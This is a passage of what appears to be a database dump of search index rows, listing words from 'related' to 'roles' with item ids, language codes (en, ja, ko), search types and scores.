('related', 93, 'ja', 'help_search', 2.4897),
('related', 93, 'ko', 'help_search', 2.4897),
('related', 183, 'en', 'node_search', 1),
('relationship', 31, 'ja', 'help_search', 1.85133),
('relationships', 25, 'en', 'node_search', 1),
('relationships', 93, 'en', 'help_search', 3.5843),
('relationships', 93, 'ja', 'help_search', 3.5843),
('relationships', 93, 'ko', 'help_search', 3.5843),
('released', 38, 'en', 'help_search', 1),
('released', 38, 'ja', 'help_search', 1),
('released', 38, 'ko', 'help_search', 1),
('releases', 38, 'en', 'help_search', 1),
('releases', 38, 'ja', 'help_search', 1),
('releases', 38, 'ko', 'help_search', 1),
('releases', 76, 'en', 'help_search', 1),
('releases', 76, 'ja', 'help_search', 1),
('releases', 76, 'ko', 'help_search', 1),
('relevant', 138, 'en', 'node_search', 1),
('reliable', 66, 'en', 'node_search', 1),
('reliable', 179, 'en', 'node_search', 1),
('religion', 24, 'en', 'node_search', 1),
('religious', 27, 'en', 'node_search', 0.899454),
('remain', 7, 'en', 'help_search', 0.902857),
('remain', 7, 'ja', 'help_search', 0.902857),
('remain', 7, 'ko', 'help_search', 0.902857),
('remain', 9, 'en', 'help_search', 1),
('remain', 9, 'ja', 'help_search', 1),
('remain', 9, 'ko', 'help_search', 1),
('remain', 179, 'en', 'node_search', 1),
('remaining', 31, 'en', 'node_search', 1),
('remaining', 180, 'en', 'node_search', 1),
('remaining', 194, 'en', 'node_search', 1),
('remaining', 196, 'en', 'node_search', 1),
('remains', 160, 'en', 'node_search', 1),
('remains', 161, 'en', 'node_search', 1),
('remains', 164, 'en', 'node_search', 1),
('remains', 167, 'en', 'node_search', 1),
('remains', 175, 'en', 'node_search', 1),
('remarkable', 170, 'en', 'node_search', 4),
('remember', 87, 'en', 'node_search', 1),
('remote', 35, 'en', 'help_search', 1),
('remote', 35, 'ja', 'help_search', 1),
('remote', 35, 'ko', 'help_search', 1),
('remove', 17, 'en', 'help_search', 2),
('remove', 17, 'ja', 'help_search', 2),
('remove', 17, 'ko', 'help_search', 2),
('remove', 69, 'en', 'help_search', 1.96498),
('remove', 69, 'ja', 'help_search', 1.96498),
('remove', 69, 'ko', 'help_search', 1.96498),
('removing', 33, 'en', 'help_search', 1),
('removing', 33, 'ja', 'help_search', 1),
('removing', 33, 'ko', 'help_search', 1),
('render', 37, 'en', 'help_search', 0.906287),
('render', 37, 'ja', 'help_search', 0.906287),
('render', 37, 'ko', 'help_search', 0.906287),
('rendered', 2, 'en', 'help_search', 1),
('rendered', 2, 'ja', 'help_search', 1),
('rendered', 2, 'ko', 'help_search', 1),
('rendering', 37, 'en', 'help_search', 1),
('rendering', 37, 'ja', 'help_search', 1),
('rendering', 37, 'ko', 'help_search', 1),
('renders', 67, 'en', 'help_search', 1),
('renders', 67, 'ja', 'help_search', 1),
('renders', 67, 'ko', 'help_search', 1),
('renowned', 62, 'en', 'node_search', 1),
('reordering', 36, 'en', 'help_search', 1),
('reordering', 36, 'ja', 'help_search', 1),
('reordering', 36, 'ko', 'help_search', 1),
('reordering', 58, 'en', 'help_search', 26),
('reordering', 58, 'ja', 'help_search', 26),
('reordering', 58, 'ko', 'help_search', 26),
('repair', 24, 'en', 'node_search', 0.972861),
('repair', 27, 'en', 'node_search', 1),
('repeat', 28, 'en', 'help_search', 0.779231),
('repeat', 28, 'ja', 'help_search', 0.779231),
('repeat', 28, 'ko', 'help_search', 0.779231),
('repeat', 48, 'en', 'help_search', 1),
('repeat', 48, 'ja', 'help_search', 1),
('repeat', 48, 'ko', 'help_search', 1),
('repeat', 52, 'en', 'help_search', 1),
('repeat', 52, 'ja', 'help_search', 1),
('repeat', 52, 'ko', 'help_search', 1),
('repeat', 69, 'en', 'help_search', 1),
('repeat', 69, 'ja', 'help_search', 1),
('repeat', 69, 'ko', 'help_search', 1),
('repeat', 71, 'en', 'help_search', 1),
('repeat', 71, 'ja', 'help_search', 1),
('repeat', 71, 'ko', 'help_search', 1),
('repeat', 82, 'en', 'help_search', 1),
('repeat', 82, 'ja', 'help_search', 1),
('repeat', 82, 'ko', 'help_search', 1),
('replace', 87, 'en', 'node_search', 1),
('replacement', 22, 'en', 'help_search', 1),
('replacement', 22, 'ja', 'help_search', 1),
('replacement', 22, 'ko', 'help_search', 1),
('replacement', 39, 'en', 'help_search', 1),
('replacement', 39, 'ja', 'help_search', 1),
('replacement', 39, 'ko', 'help_search', 1),
('replacement', 42, 'en', 'help_search', 1),
('replacement', 42, 'ja', 'help_search', 1),
('replacement', 42, 'ko', 'help_search', 1),
('replacement', 69, 'en', 'help_search', 1),
('replacement', 69, 'ja', 'help_search', 1),
('replacement', 69, 'ko', 'help_search', 1),
('replacement', 81, 'en', 'help_search', 1),
('replacement', 81, 'ja', 'help_search', 1),
('replacement', 81, 'ko', 'help_search', 1),
('replacements', 43, 'en', 'help_search', 1),
('replacements', 43, 'ja', 'help_search', 1),
('replacements', 43, 'ko', 'help_search', 1),
('reply', 7, 'en', 'help_search', 10.8746),
('reply', 7, 'ja', 'help_search', 10.8746),
('reply', 7, 'ko', 'help_search', 10.8746),
('report', 53, 'en', 'help_search', 3),
('report', 53, 'ja', 'help_search', 3),
('report', 53, 'ko', 'help_search', 3),
('report', 76, 'en', 'help_search', 10),
('report', 76, 'ja', 'help_search', 10),
('report', 76, 'ko', 'help_search', 10),
('reported', 38, 'en', 'help_search', 1),
('reported', 38, 'ja', 'help_search', 1),
('reported', 38, 'ko', 'help_search', 1),
('reports', 34, 'en', 'help_search', 1),
('reports', 34, 'ja', 'help_search', 1),
('reports', 34, 'ko', 'help_search', 1),
('reports', 43, 'en', 'help_search', 3.63897),
('reports', 43, 'ja', 'help_search', 3.63897),
('reports', 43, 'ko', 'help_search', 3.63897),
('reports', 53, 'en', 'help_search', 4),
('reports', 53, 'ja', 'help_search', 4),
('reports', 53, 'ko', 'help_search', 4),
('reports', 76, 'en', 'help_search', 39),
('reports', 76, 'ja', 'help_search', 39),
('reports', 76, 'ko', 'help_search', 39),
('represents', 175, 'en', 'node_search', 1),
('represents', 178, 'en', 'node_search', 1),
('represents', 185, 'en', 'node_search', 1),
('represents', 188, 'en', 'node_search', 1),
('represents', 190, 'en', 'node_search', 1),
('represents', 196, 'en', 'node_search', 1),
('represents', 197, 'en', 'node_search', 1),
('reproduced', 30, 'en', 'help_search', 0.863659),
('reproduced', 30, 'ja', 'help_search', 0.863659),
('reproduced', 30, 'ko', 'help_search', 0.863659),
('request', 44, 'en', 'help_search', 1),
('request', 44, 'ja', 'help_search', 1),
('request', 44, 'ko', 'help_search', 1),
('request', 50, 'en', 'help_search', 1),
('request', 50, 'ja', 'help_search', 1),
('request', 50, 'ko', 'help_search', 1),
('request', 86, 'en', 'help_search', 1),
('request', 86, 'ja', 'help_search', 1),
('request', 86, 'ko', 'help_search', 1),
('requested', 37, 'en', 'help_search', 1.9496),
('requested', 37, 'ja', 'help_search', 1.9496),
('requested', 37, 'ko', 'help_search', 1.9496),
('requests', 44, 'en', 'help_search', 1),
('requests', 44, 'ja', 'help_search', 1),
('requests', 44, 'ko', 'help_search', 1),
('requests', 69, 'en', 'node_search', 1),
('require', 23, 'en', 'help_search', 0.863659),
('require', 23, 'ja', 'help_search', 0.863659),
('require', 23, 'ko', 'help_search', 0.863659),
('require', 48, 'en', 'help_search', 1),
('require', 48, 'ja', 'help_search', 1),
('require', 48, 'ko', 'help_search', 1),
('require', 93, 'en', 'help_search', 1),
('require', 93, 'ja', 'help_search', 1),
('require', 93, 'ko', 'help_search', 1),
('required', 7, 'en', 'help_search', 4.8289),
('required', 7, 'ja', 'help_search', 4.8289),
('required', 7, 'ko', 'help_search', 4.8289),
('required', 23, 'en', 'node_search', 0.794753),
('required', 24, 'en', 'help_search', 4),
('required', 24, 'en', 'node_search', 1),
('required', 24, 'ja', 'help_search', 4),
('required', 24, 'ko', 'help_search', 4),
('required', 27, 'en', 'help_search', 4),
('required', 27, 'ja', 'help_search', 4),
('required', 27, 'ko', 'help_search', 4),
('required', 42, 'en', 'help_search', 1),
('required', 42, 'ja', 'help_search', 1),
('required', 42, 'ko', 'help_search', 1),
('required', 64, 'en', 'help_search', 1),
('required', 64, 'ja', 'help_search', 1),
('required', 64, 'ko', 'help_search', 1),
('required', 68, 'en', 'help_search', 0.923838),
('required', 68, 'ja', 'help_search', 0.923838),
('required', 68, 'ko', 'help_search', 0.923838),
('required', 184, 'en', 'node_search', 1),
('requirement', 24, 'en', 'node_search', 0.805455),
('requirements', 162, 'en', 'node_search', 3.70972),
('requires', 30, 'en', 'help_search', 0.712106),
('requires', 30, 'ja', 'help_search', 0.712106),
('requires', 30, 'ko', 'help_search', 0.712106),
('requires', 39, 'en', 'help_search', 1),
('requires', 39, 'ja', 'help_search', 1),
('requires', 39, 'ko', 'help_search', 1),
('requires', 74, 'en', 'help_search', 1),
('requires', 74, 'ja', 'help_search', 1),
('requires', 74, 'ko', 'help_search', 1),
('requires', 75, 'en', 'help_search', 1),
('requires', 75, 'ja', 'help_search', 1),
('requires', 75, 'ko', 'help_search', 1),
('requires', 86, 'en', 'help_search', 1),
('requires', 86, 'ja', 'help_search', 1),
('requires', 86, 'ko', 'help_search', 1),
('requires', 189, 'en', 'node_search', 1),
('requires', 190, 'en', 'node_search', 1),
('requiring', 11, 'en', 'help_search', 0.957226),
('requiring', 11, 'ja', 'help_search', 0.957226),
('requiring', 11, 'ko', 'help_search', 0.957226),
('reset', 86, 'en', 'help_search', 2),
('reset', 86, 'ja', 'help_search', 2),
('reset', 86, 'ko', 'help_search', 2),
('reside', 150, 'en', 'node_search', 1),
('residential', 27, 'en', 'node_search', 0.749958),
('resides', 30, 'en', 'help_search', 1),
('resides', 30, 'ja', 'help_search', 1),
('resides', 30, 'ko', 'help_search', 1),
('resized', 6, 'en', 'help_search', 1),
('resized', 6, 'ja', 'help_search', 1),
('resized', 6, 'ko', 'help_search', 1),
('resolution', 6, 'en', 'help_search', 47.9496),
('resolution', 6, 'ja', 'help_search', 47.9496),
('resolution', 6, 'ko', 'help_search', 47.9496),
('resorts', 155, 'en', 'node_search', 1),
('resource', 27, 'en', 'node_search', 1),
('resource', 65, 'en', 'help_search', 1),
('resource', 65, 'ja', 'help_search', 1),
('resource', 65, 'ko', 'help_search', 1),
('resources', 2, 'en', 'help_search', 19),
('resources', 2, 'ja', 'help_search', 19),
('resources', 2, 'ko', 'help_search', 19),
('resources', 6, 'en', 'help_search', 18.0423),
('resources', 6, 'ja', 'help_search', 18.0423),
('resources', 6, 'ko', 'help_search', 18.0423),
('resources', 7, 'en', 'help_search', 16.8985),
('resources', 7, 'ja', 'help_search', 16.8985),
('resources', 7, 'ko', 'help_search', 16.8985),
('resources', 10, 'en', 'help_search', 19),
('resources', 10, 'ja', 'help_search', 19),
('resources', 10, 'ko', 'help_search', 19),
('resources', 25, 'en', 'node_search', 1),
('resources', 29, 'en', 'help_search', 17.8293),
('resources', 29, 'ja', 'help_search', 17.8293),
('resources', 29, 'ko', 'help_search', 17.8293),
('resources', 30, 'en', 'help_search', 12.9173),
('resources', 30, 'ja', 'help_search', 12.9173),
('resources', 30, 'ko', 'help_search', 12.9173),
('resources', 32, 'en', 'help_search', 18.4844),
('resources', 32, 'ja', 'help_search', 18.4844),
('resources', 32, 'ko', 'help_search', 18.4844),
('resources', 33, 'en', 'help_search', 19),
('resources', 33, 'ja', 'help_search', 19),
('resources', 33, 'ko', 'help_search', 19),
('resources', 34, 'en', 'help_search', 19),
('resources', 34, 'ja', 'help_search', 19),
('resources', 34, 'ko', 'help_search', 19),
('resources', 35, 'en', 'help_search', 18.1145),
('resources', 35, 'ja', 'help_search', 18.1145),
('resources', 35, 'ko', 'help_search', 18.1145),
('resources', 36, 'en', 'help_search', 19),
('resources', 36, 'ja', 'help_search', 19),
('resources', 36, 'ko', 'help_search', 19),
('resources', 37, 'en', 'help_search', 16.1181),
('resources', 37, 'ja', 'help_search', 16.1181),
('resources', 37, 'ko', 'help_search', 16.1181),
('resources', 38, 'en', 'help_search', 19),
('resources', 38, 'ja', 'help_search', 19),
('resources', 38, 'ko', 'help_search', 19),
('resources', 44, 'en', 'help_search', 20),
('resources', 44, 'ja', 'help_search', 20),
('resources', 44, 'ko', 'help_search', 20),
('resources', 46, 'en', 'help_search', 17.8293),
('resources', 46, 'ja', 'help_search', 17.8293),
('resources', 46, 'ko', 'help_search', 17.8293),
('resources', 59, 'en', 'help_search', 19),
('resources', 59, 'ja', 'help_search', 19),
('resources', 59, 'ko', 'help_search', 19),
('resources', 60, 'en', 'help_search', 19),
('resources', 60, 'ja', 'help_search', 19),
('resources', 60, 'ko', 'help_search', 19),
('resources', 61, 'en', 'help_search', 18.2607),
('resources', 61, 'ja', 'help_search', 18.2607),
('resources', 61, 'ko', 'help_search', 18.2607),
('resources', 63, 'en', 'help_search', 19),
('resources', 63, 'ja', 'help_search', 19),
('resources', 63, 'ko', 'help_search', 19),
('resources', 65, 'en', 'help_search', 19),
('resources', 65, 'ja', 'help_search', 19),
('resources', 65, 'ko', 'help_search', 19),
('resources', 68, 'en', 'help_search', 14.9024),
('resources', 68, 'ja', 'help_search', 14.9024),
('resources', 68, 'ko', 'help_search', 14.9024),
('resources', 70, 'en', 'help_search', 19),
('resources', 70, 'ja', 'help_search', 19),
('resources', 70, 'ko', 'help_search', 19),
('resources', 71, 'en', 'help_search', 19),
('resources', 71, 'ja', 'help_search', 19),
('resources', 71, 'ko', 'help_search', 19),
('resources', 76, 'en', 'help_search', 19),
('resources', 76, 'ja', 'help_search', 19),
('resources', 76, 'ko', 'help_search', 19),
('resources', 79, 'en', 'help_search', 19),
('resources', 79, 'ja', 'help_search', 19),
('resources', 79, 'ko', 'help_search', 19),
('resources', 80, 'en', 'help_search', 16.8985),
('resources', 80, 'ja', 'help_search', 16.8985),
('resources', 80, 'ko', 'help_search', 16.8985),
('resources', 91, 'en', 'help_search', 18.4844),
('resources', 91, 'ja', 'help_search', 18.4092),
('resources', 91, 'ko', 'help_search', 18.4844),
('resources', 93, 'en', 'help_search', 14.8537),
('resources', 93, 'ja', 'help_search', 14.8537),
('resources', 93, 'ko', 'help_search', 14.8537),
('respect', 25, 'en', 'node_search', 1),
('respect', 87, 'en', 'node_search', 2),
('respect', 122, 'en', 'node_search', 1),
('respected', 162, 'en', 'node_search', 1),
('respective', 23, 'en', 'help_search', 0.845322),
('respective', 23, 'ja', 'help_search', 0.845322),
('respective', 23, 'ko', 'help_search', 0.845322),
('respective', 136, 'en', 'node_search', 1),
('respectively', 41, 'en', 'help_search', 1),
('respectively', 41, 'ja', 'help_search', 1),
('respectively', 41, 'ko', 'help_search', 1),
('respond', 6, 'en', 'help_search', 2),
('respond', 6, 'ja', 'help_search', 2),
('respond', 6, 'ko', 'help_search', 2),
('respond', 72, 'en', 'help_search', 1),
('respond', 72, 'ja', 'help_search', 1),
('respond', 72, 'ko', 'help_search', 1),
('response', 37, 'en', 'help_search', 1),
('response', 37, 'ja', 'help_search', 1),
('response', 37, 'ko', 'help_search', 1),
('response', 72, 'en', 'help_search', 5),
('response', 72, 'ja', 'help_search', 5),
('response', 72, 'ko', 'help_search', 5),
('responses', 72, 'en', 'help_search', 48),
('responses', 72, 'ja', 'help_search', 48),
('responses', 72, 'ko', 'help_search', 48),
('responsibilities', 155, 'en', 'node_search', 1),
('responsibilities', 162, 'en', 'node_search', 4),
('responsibilities', 186, 'en', 'node_search', 1),
('responsibility', 189, 'en', 'node_search', 1),
('responsible', 23, 'en', 'node_search', 0.876337),
('responsible', 142, 'en', 'node_search', 1),
('responsible', 162, 'en', 'node_search', 0.913226),
('responsive', 35, 'en', 'help_search', 3.97954),
('responsive', 35, 'ja', 'help_search', 3.97954),
('responsive', 35, 'ko', 'help_search', 3.97954),
('responsive', 48, 'en', 'help_search', 1),
('responsive', 48, 'ja', 'help_search', 1),
('responsive', 48, 'ko', 'help_search', 1),
('rest', 23, 'en', 'help_search', 0.961087),
('rest', 23, 'ja', 'help_search', 0.961087),
('rest', 23, 'ko', 'help_search', 0.961087),
('rest', 44, 'en', 'help_search', 11),
('rest', 44, 'ja', 'help_search', 11),
('rest', 44, 'ko', 'help_search', 11),
('restaurant', 66, 'en', 'node_search', 1),
('restaurant', 67, 'ja', 'node_search', 1),
('restaurant', 68, 'en', 'node_search', 2),
('restaurant', 68, 'ja', 'node_search', 1),
('restaurant', 70, 'en', 'node_search', 1),
('restaurant', 71, 'en', 'node_search', 1),
('restaurant', 72, 'en', 'node_search', 1),
('restaurant', 73, 'en', 'node_search', 1),
('restaurant', 74, 'en', 'node_search', 1),
('restaurant', 75, 'en', 'node_search', 1),
('restaurant', 77, 'en', 'node_search', 4),
('restaurant', 81, 'en', 'node_search', 4),
('restaurant', 82, 'en', 'node_search', 1),
('restaurant', 84, 'en', 'node_search', 1),
('restaurant', 85, 'en', 'node_search', 4),
('restaurant', 90, 'en', 'node_search', 1),
('restaurant', 95, 'en', 'node_search', 27),
('restaurant', 95, 'ja', 'node_search', 27),
('restaurant', 98, 'en', 'node_search', 28),
('restaurant', 98, 'ja', 'node_search', 27),
('restaurant', 100, 'en', 'node_search', 4),
('restaurant', 101, 'en', 'node_search', 1),
('restaurant', 102, 'en', 'node_search', 1),
('restaurant', 104, 'en', 'node_search', 1),
('restaurant', 106, 'en', 'node_search', 1),
('restaurant', 107, 'en', 'node_search', 1),
('restaurant', 109, 'en', 'node_search', 1),
('restaurant', 110, 'en', 'node_search', 1),
('restaurant', 112, 'en', 'node_search', 1),
('restaurant', 114, 'en', 'node_search', 1),
('restaurant', 117, 'en', 'node_search', 1),
('restaurant', 118, 'en', 'node_search', 1),
('restaurant', 119, 'en', 'node_search', 1),
('restaurant', 123, 'en', 'node_search', 1),
('restaurant', 124, 'en', 'node_search', 1),
('restaurant', 125, 'en', 'node_search', 1),
('restaurant', 127, 'en', 'node_search', 1),
('restaurant', 127, 'ja', 'node_search', 1),
('restaurant', 131, 'en', 'node_search', 1),
('restaurant', 134, 'en', 'node_search', 1),
('restaurant', 135, 'en', 'node_search', 2),
('restaurant', 136, 'en', 'node_search', 1),
('restaurant', 138, 'en', 'node_search', 1),
('restaurant', 140, 'en', 'node_search', 1),
('restaurant', 143, 'en', 'node_search', 1),
('restaurant', 144, 'en', 'node_search', 1),
('restaurant', 156, 'en', 'node_search', 2),
('restaurant', 157, 'en', 'node_search', 2),
('restaurants', 95, 'en', 'node_search', 1),
('restaurantsthe', 133, 'en', 'node_search', 1),
('restful', 44, 'en', 'help_search', 23),
('restful', 44, 'ja', 'help_search', 23),
('restful', 44, 'ko', 'help_search', 23),
('restrict', 28, 'en', 'help_search', 1.86995),
('restrict', 28, 'ja', 'help_search', 1.86995),
('restrict', 28, 'ko', 'help_search', 1.86995),
('restrictions', 23, 'en', 'help_search', 1),
('restrictions', 23, 'ja', 'help_search', 1),
('restrictions', 23, 'ko', 'help_search', 1),
('restrictive', 89, 'en', 'help_search', 1),
('restrictive', 89, 'ja', 'help_search', 1),
('restrictive', 89, 'ko', 'help_search', 1),
('restricts', 28, 'en', 'help_search', 1.80818),
('restricts', 28, 'ja', 'help_search', 1.80818),
('restricts', 28, 'ko', 'help_search', 1.80818),
('resturtant', 116, 'en', 'node_search', 46),
('resturtant', 116, 'ja', 'node_search', 27),
('resturtant', 122, 'en', 'node_search', 46),
('resturtant', 122, 'ja', 'node_search', 27),
('result', 50, 'en', 'help_search', 1),
('result', 50, 'ja', 'help_search', 1),
('result', 50, 'ko', 'help_search', 1),
('result', 72, 'en', 'help_search', 1),
('result', 72, 'ja', 'help_search', 1),
('result', 72, 'ko', 'help_search', 1),
('result', 93, 'en', 'help_search', 0.953396),
('result', 93, 'ja', 'help_search', 0.953396),
('result', 93, 'ko', 'help_search', 0.953396),
('result', 160, 'en', 'node_search', 1),
('result', 179, 'en', 'node_search', 28),
('result', 180, 'en', 'node_search', 4),
('result', 182, 'en', 'node_search', 1),
('result', 188, 'en', 'node_search', 27),
('result', 190, 'en', 'node_search', 1),
('result', 191, 'en', 'node_search', 1),
('result', 192, 'en', 'node_search', 28),
('result', 196, 'en', 'node_search', 1),
('results', 28, 'en', 'help_search', 0.827757),
('results', 28, 'ja', 'help_search', 0.827757),
('results', 28, 'ko', 'help_search', 0.827757),
('results', 66, 'en', 'help_search', 1),
('results', 66, 'ja', 'help_search', 1),
('results', 67, 'en', 'help_search', 1),
('results', 67, 'ja', 'help_search', 1),
('results', 67, 'ko', 'help_search', 1),
('results', 68, 'en', 'help_search', 1),
('results', 68, 'ja', 'help_search', 1),
('results', 68, 'ko', 'help_search', 1),
('results', 70, 'en', 'help_search', 1),
('results', 70, 'ja', 'help_search', 1),
('results', 70, 'ko', 'help_search', 1),
('results', 93, 'en', 'help_search', 3.84435),
('results', 93, 'ja', 'help_search', 3.84435),
('results', 93, 'ko', 'help_search', 3.84435),
('retrieved', 37, 'en', 'help_search', 1),
('retrieved', 37, 'ja', 'help_search', 1),
('retrieved', 37, 'ko', 'help_search', 1),
('return', 23, 'en', 'help_search', 1.82026),
('return', 23, 'ja', 'help_search', 1.82026),
('return', 23, 'ko', 'help_search', 1.82026),
('return', 25, 'ja', 'help_search', 1),
('return', 26, 'en', 'help_search', 1),
('return', 26, 'ja', 'help_search', 1),
('return', 26, 'ko', 'help_search', 1),
('return', 28, 'en', 'help_search', 0.781775),
('return', 28, 'ja', 'help_search', 0.781775),
('return', 28, 'ko', 'help_search', 0.781775),
('return', 73, 'en', 'help_search', 1),
('return', 73, 'ja', 'help_search', 1),
('return', 73, 'ko', 'help_search', 1),
('return', 91, 'en', 'help_search', 1),
('return', 91, 'ja', 'help_search', 1),
('return', 91, 'ko', 'help_search', 1),
('returned', 5, 'en', 'help_search', 1),
('returned', 5, 'ja', 'help_search', 1),
('returned', 5, 'ko', 'help_search', 1),
('returned', 22, 'en', 'help_search', 0.957226),
('returned', 22, 'ja', 'help_search', 0.957226),
('returned', 22, 'ko', 'help_search', 0.957226),
('returned', 24, 'en', 'help_search', 1),
('returned', 24, 'ja', 'help_search', 1),
('returned', 24, 'ko', 'help_search', 1),
('returned', 27, 'en', 'help_search', 1),
('returned', 27, 'ja', 'help_search', 1),
('returned', 27, 'ko', 'help_search', 1),
('returned', 49, 'en', 'help_search', 1),
('returned', 49, 'ja', 'help_search', 1),
('returned', 49, 'ko', 'help_search', 1),
('returned', 56, 'en', 'help_search', 1),
('returned', 56, 'ja', 'help_search', 1),
('returned', 56, 'ko', 'help_search', 1),
('returned', 64, 'en', 'help_search', 1),
('returned', 64, 'ja', 'help_search', 1),
('returned', 64, 'ko', 'help_search', 1),
('returned', 66, 'en', 'help_search', 1),
('returned', 66, 'ja', 'help_search', 1),
('returned', 67, 'en', 'help_search', 0.953396),
('returned', 67, 'ja', 'help_search', 0.953396),
('returned', 67, 'ko', 'help_search', 0.953396),
('returned', 74, 'en', 'help_search', 1),
('returned', 74, 'ja', 'help_search', 1),
('returned', 74, 'ko', 'help_search', 1),
('returned', 75, 'en', 'help_search', 1),
('returned', 75, 'ja', 'help_search', 1),
('returned', 75, 'ko', 'help_search', 1),
('returned', 77, 'en', 'help_search', 1),
('returned', 77, 'ja', 'help_search', 1),
('returned', 77, 'ko', 'help_search', 1),
('returned', 83, 'en', 'help_search', 1),
('returned', 83, 'ja', 'help_search', 1),
('returned', 83, 'ko', 'help_search', 1),
('reuse', 54, 'en', 'help_search', 1),
('reuse', 54, 'ja', 'help_search', 1),
('reuse', 54, 'ko', 'help_search', 1),
('reusing', 35, 'en', 'help_search', 1),
('reusing', 35, 'ja', 'help_search', 1),
('reusing', 35, 'ko', 'help_search', 1),
('reverse', 44, 'en', 'help_search', 1),
('reverse', 44, 'ja', 'help_search', 1),
('reverse', 44, 'ko', 'help_search', 1),
('reverse', 61, 'en', 'help_search', 1),
('reverse', 61, 'ja', 'help_search', 1),
('reverse', 61, 'ko', 'help_search', 1),
('review', 14, 'en', 'help_search', 1),
('review', 14, 'ja', 'help_search', 1),
('review', 14, 'ko', 'help_search', 1),
('review', 85, 'en', 'help_search', 1),
('review', 85, 'ja', 'help_search', 1),
('review', 85, 'ko', 'help_search', 1),
('reviews', 11, 'en', 'help_search', 0.993146),
('reviews', 11, 'ja', 'help_search', 0.993146),
('reviews', 11, 'ko', 'help_search', 0.993146),
('rewarding', 160, 'en', 'node_search', 1),
('rewarding', 162, 'en', 'node_search', 1),
('rewarding', 164, 'en', 'node_search', 1),
('rewarding', 165, 'en', 'node_search', 1),
('rewarding', 168, 'en', 'node_search', 1),
('rewarding', 169, 'en', 'node_search', 1),
('rewarding', 170, 'en', 'node_search', 1),
('rewarding', 171, 'en', 'node_search', 1),
('rewarding', 176, 'en', 'node_search', 1),
('rewarding', 189, 'en', 'node_search', 1),
('rice', 24, 'en', 'node_search', 0.949597),
('rich', 122, 'en', 'node_search', 1),
('richard', 83, 'en', 'node_search', 2),
('richard', 83, 'ja', 'node_search', 2),
('richard', 115, 'en', 'node_search', 28),
('richard', 115, 'ja', 'node_search', 28),
('rid', 87, 'en', 'node_search', 1),
('right', 10, 'en', 'help_search', 2),
('right', 10, 'ja', 'help_search', 2),
('right', 10, 'ko', 'help_search', 2),
('right', 22, 'en', 'help_search', 2),
('right', 22, 'ja', 'help_search', 2),
('right', 22, 'ko', 'help_search', 2),
('right', 32, 'en', 'help_search', 1),
('right', 32, 'ja', 'help_search', 1),
('right', 32, 'ko', 'help_search', 1),
('right', 43, 'en', 'help_search', 1),
('right', 43, 'ja', 'help_search', 1),
('right', 43, 'ko', 'help_search', 1),
('right', 61, 'en', 'help_search', 1),
('right', 61, 'ja', 'help_search', 1),
('right', 61, 'ko', 'help_search', 1),
('right', 69, 'en', 'help_search', 0.98493),
('right', 69, 'ja', 'help_search', 0.98493),
('right', 69, 'ko', 'help_search', 0.98493),
('right', 80, 'en', 'help_search', 1),
('right', 80, 'ja', 'help_search', 1),
('right', 80, 'ko', 'help_search', 1),
('right', 81, 'en', 'help_search', 1),
('right', 81, 'ja', 'help_search', 1),
('right', 81, 'ko', 'help_search', 1),
('righttoleft', 10, 'en', 'help_search', 2),
('righttoleft', 10, 'ja', 'help_search', 2),
('righttoleft', 10, 'ko', 'help_search', 2),
('righttoleft', 22, 'en', 'help_search', 2),
('righttoleft', 22, 'ja', 'help_search', 2),
('righttoleft', 22, 'ko', 'help_search', 2),
('righttoleft', 39, 'en', 'help_search', 1),
('righttoleft', 39, 'ja', 'help_search', 1),
('righttoleft', 39, 'ko', 'help_search', 1),
('righttoleft', 43, 'en', 'help_search', 1),
('righttoleft', 43, 'ja', 'help_search', 1),
('righttoleft', 43, 'ko', 'help_search', 1),
('righttoleft', 61, 'en', 'help_search', 1),
('righttoleft', 61, 'ja', 'help_search', 1),
('righttoleft', 61, 'ko', 'help_search', 1),
('righttoleft', 69, 'en', 'help_search', 0.972861),
('righttoleft', 69, 'ja', 'help_search', 0.972861),
('righttoleft', 69, 'ko', 'help_search', 0.972861),
('righttoleft', 81, 'en', 'help_search', 1),
('righttoleft', 81, 'ja', 'help_search', 1),
('righttoleft', 81, 'ko', 'help_search', 1),
('rise', 27, 'en', 'node_search', 0.842342),
('risk', 28, 'en', 'help_search', 3.44219),
('risk', 28, 'ja', 'help_search', 3.44219),
('risk', 28, 'ko', 'help_search', 3.44219),
('road', 4, 'en', 'node_search', 1),
('road', 4, 'ja', 'node_search', 1),
('road', 11, 'en', 'node_search', 1),
('road', 11, 'ja', 'node_search', 1),
('road', 27, 'en', 'node_search', 1),
('roads', 27, 'en', 'node_search', 1),
('rokushiken', 62, 'en', 'node_search', 0.896076),
('role', 11, 'en', 'help_search', 0.997306),
('role', 11, 'ja', 'help_search', 0.997306),
('role', 11, 'ko', 'help_search', 0.997306),
('role', 22, 'en', 'help_search', 1),
('role', 22, 'ja', 'help_search', 1),
('role', 22, 'ko', 'help_search', 1),
('role', 69, 'en', 'help_search', 1),
('role', 69, 'ja', 'help_search', 1),
('role', 69, 'ko', 'help_search', 1),
('role', 81, 'en', 'help_search', 1),
('role', 81, 'ja', 'help_search', 1),
('role', 81, 'ko', 'help_search', 1),
('role', 83, 'en', 'help_search', 38),
('role', 83, 'ja', 'help_search', 38),
('role', 83, 'ko', 'help_search', 38),
('role', 84, 'en', 'help_search', 21),
('role', 84, 'ja', 'help_search', 21),
('role', 84, 'ko', 'help_search', 21),
('role', 85, 'en', 'help_search', 31),
('role', 85, 'ja', 'help_search', 31),
('role', 85, 'ko', 'help_search', 31),
('role', 93, 'en', 'help_search', 0.997306),
('role', 93, 'ja', 'help_search', 0.997306),
('role', 93, 'ko', 'help_search', 0.997306),
('role', 162, 'en', 'node_search', 1),
('role', 188, 'en', 'node_search', 1),
('roleplaying', 67, 'ja', 'node_search', 1),
('roleplaying', 135, 'en', 'node_search', 1),
('roles', 11, 'en', 'help_search', 1.90974),
('roles', 11, 'ja', 'help_search', 1.90974),
('roles', 11, 'ko', 'help_search', 1.90974),
('roles', 18, 'en', 'help_search', 1),
('roles', 18, 'ja', 'help_search', 1),
('roles', 18, 'ko', 'help_search', 1),
('roles', 28, 'en', 'help_search', 3.61143),
('roles', 28, 'ja', 'help_search', 3.61143),
('roles', 28, 'ko', 'help_search', 3.61143),
('roles', 68, 'en', 'help_search', 1.68779),
('roles', 68, 'ja', 'help_search', 1.68779),
('roles', 68, 'ko', 'help_search', 1.68779),
('roles', 80, 'en', 'node_search', 1),
('roles', 82, 'en', 'help_search', 4),
('roles', 82, 'ja', 'help_search', 4),
('roles', 82, 'ko', 'help_search', 4),
('roles', 83, 'en', 'help_search', 8),
('roles', 83, 'ja', 'help_search', 8),
('roles', 83, 'ko', 'help_search', 8),
('roles', 84, 'en', 'help_search', 7),
('roles', 84, 'ja', 'help_search', 7),
('roles', 84, 'ko', 'help_search', 7),
